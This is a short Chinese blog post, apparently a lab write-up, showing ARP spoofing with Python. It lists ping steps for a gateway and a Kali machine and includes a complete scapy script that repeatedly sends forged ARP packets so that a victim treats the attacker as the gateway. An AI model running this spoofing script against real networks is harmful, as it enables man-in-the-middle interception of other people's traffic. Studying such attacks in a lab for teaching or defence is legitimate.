使用python实现arp欺骗

实验拓扑:

1.首先进行ping测试网关和kali,来获取mac地址

ping 192.168.72.131

ping 192.168.72.20

MAC地址对应结果如下:

2.进行使用脚本中间人欺骗,脚本放在最后

3.查看欺骗后的arp表,R1和PC1都认为对方的mac地址是7B-26,也就是kali的mac

 python脚本:

import sys
import time
from scapy.all import sendp, ARP, Ether

if len(sys.argv) != 3:
    print(sys.argv[0] + ":<target_IP> <spoof_ip>")
    sys.exit()

victimIP = sys.argv[1]  # 接收第二个参数:target_IP
gatewayIP = sys.argv[2]
packet = Ether() / ARP(psrc=gatewayIP, pdst=victimIP)  # 封装一个二层的ARP包,进行欺骗

while True:
    sendp(packet)   # 发送包
    time.sleep(3)
    print(packet.show())

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值